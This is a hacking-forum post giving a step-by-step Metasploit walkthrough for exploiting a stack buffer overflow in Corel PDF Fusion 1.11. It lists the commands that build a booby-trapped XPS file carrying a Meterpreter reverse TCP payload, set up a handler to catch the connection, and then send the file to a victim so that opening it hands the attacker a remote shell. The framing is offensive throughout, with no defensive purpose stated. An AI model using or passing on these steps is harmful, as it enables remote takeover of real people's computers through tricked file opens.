• We just launched and are currently in beta. Join us as we build and grow the community.

Exploit Remote Windows PC using Corel PDF Fusion Stack Buffer Overflow

Ethanlad123

Influence Amplifier
E Rep
0
0
0
Rep
0
E Vouches
0
0
0
Vouches
0
Posts
185
Likes
133
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 100 XP
This module exploits stack-based buffer overflow vulnerability in version 1.11 of Corel PDF Fusion. The vulnerability exists while handling a XPS file with long entry names. In order for the payload to be executed, an attacker must convince the target user to open a specially crafted XPS file with Corel PDF Fusion. By doing so, the attacker can execute arbitrary code as the target user.

Exploit Targets

Corel Pdf 1.11

Requirement

Attacker: Kali Linux

Victim PC: Windows XP SP 3

Open Kali Linux terminal type msfconsole

1.jpg


Now type use exploit/windows/fileformat/corelpdf_fusion_bof

msf exploit (corelpdf_fusion_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (corelpdf_fusion_bof)>set lhost 192.168.1.147 (IP of Local Host)

msf exploit (corelpdf_fusion_bof)>exploit

2.jpg


After we successfully generate the malicious xps File, it will stored on your local computer

/root/.msf4/local/msf.xps

3.jpg


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.147

exploit

Now send your msf.xps files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

5.jpg


4.jpg
 

452,496

338,631

338,639

Top